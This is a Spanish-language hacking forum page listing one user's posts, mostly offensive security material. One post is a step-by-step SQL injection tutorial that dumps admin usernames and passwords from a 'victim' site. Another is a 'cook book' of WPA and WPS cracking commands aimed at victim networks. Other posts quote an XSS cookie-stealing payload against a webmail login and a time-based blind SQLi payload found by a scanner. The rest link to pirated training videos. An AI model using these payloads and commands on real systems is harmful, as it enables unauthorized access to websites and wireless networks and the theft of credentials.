Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - TeNeX

#1
ASM / Linux Assembly Expert
Agosto 05, 2013, 03:41:03 PM
Buenas, este es un curso que estaba buscando, la verdad es que NO creo que este completo pues he visto isos de aprox 2 gigas, sin embargo aqui les dejo una serie de videos para que los desacarguen, si alguien tiene el iso completo estaría excelente lo compartiera

EDIT: Ya verifique y solo son los primeros 11 videos del modulo 1

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

respecto al iso completo, estan dos torrents pero faltan seeders :(

Este torrent trae un compilado de algunos que son gratuitos
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

y el que se supone esta full lo pueden googlear por II_AEH.7z  es un torrent pero como dije antes faltan seeders :(
#2
Hacking ShowOff / Inyeccion sql
Abril 28, 2013, 05:30:08 PM
buenas, quiero compartir con ustedes como una inyección por get puede arrojar usuarios de worpress

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

arrojará en la propia web el usuario y el hash :) no pude subir el screen del sitio pero pruebenlo :)
#3
Dudas y pedidos generales / [SOLUCIONADO] Duda XSS
Febrero 10, 2013, 04:03:30 AM
Buenas, en un webmail, me enconré con unos xss que yo les digo "raros" uno es por post y el otro es por get... por post me imagino que debo usar un proxy para poder editar y enviar el xss por post... mi duda es que los marca en el evento "onmouseover" y si soy honesto creo que necesitaría algunos ejemplos.

intento por get failed:
Código: text
https://login.server.net/index.php?clearcookies=1%27%3E%3Ca+onmouseover%3Dalert%28document.cookie%29%3Exxs%3C%2Fa%3E&app=wbe


y bueno acunetix dice esto:

- URL encoded GET input clearcookies was set to 1' onmouseover=prompt(981263) bad='

- URL encoded GET input clearcookies was set to 1' onmouseover=prompt(908631) bad='

- URL encoded GET input clearcookies was set to 1' onmouseover=prompt(907592) bad='


username

- URL encoded POST input username was set to tsklhfyf%40server.com.mx" onmouseover=prompt(910804) bad="
#4
Pentesting / SQLi Básico
Febrero 07, 2013, 10:50:43 PM
Buenas, les traigo tambien este "mini tuto" que hice basado en unos videos que ví espero les sirva para ir iniciando

SQLI Beginners

- verificamos en la url de la victima si es vulnerable a sqli realizando una busqueda en su sitio web, y colocando una comilla al final No tienes permitido ver enlaces. Registrate o Entra a tu cuenta'  <- si nos arroja un resultado del tipo "verifique su sintaxis" significa que es vulnerable

- después de esto utilizando la sentencia "order by" sacaremos el num de columnas colocando un "-" despues del singo de "=", dos guiones al final de la sentencia, quedando de la siguiente manera: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta order by [numero aleatorio]--

- enla parte de "numero aleatorio" irémos probando numeros como 10,11,12,13 y así sucesivamente, si no sucede nada intentamos con un numero mayor, hasta que obtengamos un error... lo cual significará que el numero de columnas será el numero anterior al error es decir:  si en 13 obtuvimos el error entonces el numero de columnas será 12

- ahora encontraremos los numeros vulnerables, esto lo lograremos con "union all select numero de columnas" y -- al final, recordemos que el numero de columnas lo obtuvimos en el paso anterior, quedando así:
www.victima.com/indice.php?id=-10 union all select 1,2,3,4,5,6,7,8,9,10,11,12--

- ya habrémos obtenido una serie de numeros... ¿como saber cual usar y para que usarlo? simple, el (o los) numero que aparezca como si fuera un enlace (subrayado) será el que nos permitirá inyectar

- ahora suponiendo que el numero vulnerable fue el 6, sacaremos ahora la version de la base de datos con "@@version" quedando así:
www.victima.com/indice.php?id=-10 union all select 1,2,3,4,5,@@version,7,8,9,10,11,12--

La version es inportante pues de ser menor a 5.0 tendríamos que usar bsqli

- ahora sacaremos el nombre de las tablas, para ello cambiaremos @@version por table_name  y despues del ultimo numero colocaremos "from information_schema.tables--"
www.victima.com/indice.php?id=-10 union all select 1,2,3,4,5,table_name,7,8,9,10,11,12 from information_schema.tables--

- en los resultados arrojados buscamos la tabla que nos interesa accesar, en este caso la de adminitrador... suponiendo qeu se llame "tbadmin" pasaremos a convertir el nombre de la tabla que nos interesa en ascii

www.victima.com/indice.php?id=-10 union all select 1,2,3,4,5,column_name,7,8,9,10,11,12 from information_schema.columns where table_name=char(116,98,108,97,100,109,105,110)--

116 = t
98  = b
108 = l
97  = a
100 = d
109 = m
105 = i
110 = n

ya tenemos la información... ahora vamos a scar de las tablas "username" y "password" algunos datos

- vamos a escribir en lugar de "column_name" concat(username,0x3a,password) y despues del 12 vamos a escribir "from tbladmin"

www.victima.com/indice.php?id=-10 union all select 1,2,3,4,5,concat(username.0x3a,password),7,8,9,10,11,12 from tbladmin--

esto nos arrojará el usuario y el password

- ahora tenemos que encontrar la pagina del administrador para probar el login y el password

By TeNeX
#5
Seguridad Wireless / wifi cook book
Febrero 07, 2013, 08:40:53 PM
Les traigo este aporte, es una recopilación que hice de varios ataques, procesamiento/generación de diccionarios  etc

Cracking WPA
* test with wireshark all your networks around with this filter
wps.wifi_protected_setup_state == 2

# airmon-ng start wlan0
# wireshark mon0&

Importar diccionario para WPA con airolib-ng
airolib-ng [db_name] [option [param]]

#airolib-ng crackwpa --import passwd /ruta/del/diccionario.txt
#airolib-ng crackwpa --import essid /archivo/con/el/essid
#airolib-ng crackwpa --stats
#airolib-ng crackwpa --clean all
#airolib-ng crackwpa --batch
#airolib-ng crackwpa --verify all
#aircrack-ng -r crackwpa archivo.cap

Cowpatty
*si el essid contiene espacios va entre comillas
*para hashear un diccionario se usa genpmk

#cowpatty -s [ESSID] -r archivo.cap -f /ruta/del/diccionario.txt
#cowpatty -s [ESSID] -r wpa.cap -d /ruta/del/diccionario/hasheado

Genpmk
*Generar el diccionario precomputado (hashes) para cowpatty, pyrt, etc
*Tener en cuenta que el argumento de -d podría no existir y se generaría

#genpmk -s [ESSID] -d /ruta/del/diccionario_en_Hash -f diccionario.txt
#genpmk -s [ESSID] -d [SSID] -f diccionario.txt

***Probar Contraseña***

# wpa_passphrase [ESSID] [password] > wpa.conf
# wpa_supplicant -Dwext -iwlan0 -c /ruta/del/wpa.conf

Pyrt

# cat [diccionario.txt] | sort | uniq | pw-inspector -m 8 -M 68 > dict.txt
#pyrt -e [essid] create_essid
#pyrt -f [diccionario.txt] import_passwords
#pyrt batchprocess
#aircrack-ng -w dict.txt file.cap
#airolib-ng testdb -import essid [essid]
#pyrt -e [essid] -f testdb export_hashdb
#aircrack-ng -r testdb file.cap


***DICCIONARIOS***

# cat [diccionario.txt] | sort | uniq | pw-inspector -m 8 -M 68 > dict.txt


pyrt -e [essid] -f [dictionary.txt] passthrough | cowpatty -d - -r [file.cap]

-s [essid]

Reaver

*To use reaver you need to check if victim has wps enabled and is chiper with

wpa
*then enable monitor mode and with mon0 or your new interface sniff with

wireshark and set filter to: wps.wifi_protected_setup_state == 2
*Then you got the victims with wps vuln
*Source: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

# airmon-ng start wlan0
# airodump mon0  <- to find target
# reaver -i mon0 -b [Victim_BSSID] -vv


Fakeauth

# aireplay-ng --fakeauth 10 -e [ESSID]  mon0
# aireplay-ng --fakeauth 10 -e [ESSID] -h [my mac or Spoofed_MAC_ADDRESS] mon0

Si se captura un xor packet

# airodump-ng --channel 1 mon0 --bssid [AP_Victim_MAC] --write [name.cap]
# aireplay-ng --fakeauth 10 mon0 -e [ESSID] -y [FILE.XOR]
#6
Dudas y pedidos generales / [SOLUCIONADO] Duda BSQLi
Febrero 06, 2013, 06:15:03 PM
Buenas, espero esten bien, tengo una duda... encontre un Blind SQLi pero es en un formulario, especificamente en un checkbox... mi duda es que... no me explico como se podría explotar...

el código del aspx es este

Código: text
 <div style="float:right; color:#404040;">
                                                 <input id="MainContent_chkAviso" type="checkbox" name="ctl00$MainContent$chkAviso" /><label for="MainContent_chkAviso">De acuerdo con el </label>
                                                 <a class="vwAviso" href="AvisoPrivacidad.pdf" title="Aviso de Privacidad">Aviso de Privacidad</a>


y acunetix dice esto:

URL encoded POST input ctl00%24MainContent%24chkAviso was set to 1'; waitfor delay '0:0:2.792' --

#7
Seguridad Wireless / Wlan Security Videos
Febrero 02, 2013, 03:54:29 AM
 :) Hola a todos, es la primera vez que posteo, y que mejor que para aportar algo!
les traigo el link del Securitytube Wifi Megapremier en lo personal estos cursos me agradan, he visto hasta el video 7 y va muy muy lento creo que puede abarcar mas pero es realmente "from scratch".

He estado buscando sus otros cursos como el de ASM, Python, Iphone, Metasploit etc, pero la verdad es que no he encontrado otros excepto el de metasploit tambien, pero bueno los demás si alguien tiene alguno seria bueno que lo shareara


Descarga directa ISO No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

LOG DE MODERACION
ENLACE ROTO REMOVIDO 14.03.2015 CL0UDSWX
#8
GNU/Linux / Tutoriales Ensamblador para pentest
Enero 07, 2013, 03:06:23 AM
Buenas... este es mi primer aporte... es bastante chafa... en realidad pero bueno, estaba buscando el Securitytube Python Scripting Expert Dvd Download y encontré No tienes permitido ver enlaces. Registrate o Entra a tu cuenta aqui una lista de cursos de programación, sinceramente me gustan los video tutoriales y me tope con el de ASM aunque no encontre el que quería :( pero bueno les comparto lo qu eencontré

Assembley language for Penetration tester
Below are the useful resources to learn Assembley Language for pentesters to start learning Exploit writing

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta


Linux Assembley

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Programming From the Ground Up

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta


Iczelion's Win32 Assembly Homepage
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta


Art of Assembly

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta


first 5 chapters is enough

Intel Developer Manuals
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta


Assembly Language Primer for Hackers Videos

Assembly Primer for Hackers (Part 1) System Organization
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta


Assembly Primer for Hackers (Part 2) Virtual Memory Organization
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta


Assembly Primer for Hackers (Part 3) GDB Usage Primer
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta


Assembly Primer for Hackers (Part 4) Hello World
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta


Assembly Primer for Hackers (Part 5) Data Types
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta


Assembly Primer for Hackers (Part 6) Moving Data
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta


Assembly Primer for Hackers (Part 7) Working with Strings
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta


No tienes permitido ver enlaces. Registrate o Entra a tu cuenta


Assembly Primer for Hackers (Part 9) Conditional Branching
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta


Assembly Primer for Hackers (Part 10) Functions
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta


Assembly Primer for Hackers (Part 11) Functions Stack
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta


fuente: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta aqui
y aqu ila fuente de la fuente: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

estoy descargando el SMFE (SecurityTube Metasploit Framework Expert) el cual tambien comparto
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta aqui para ustedes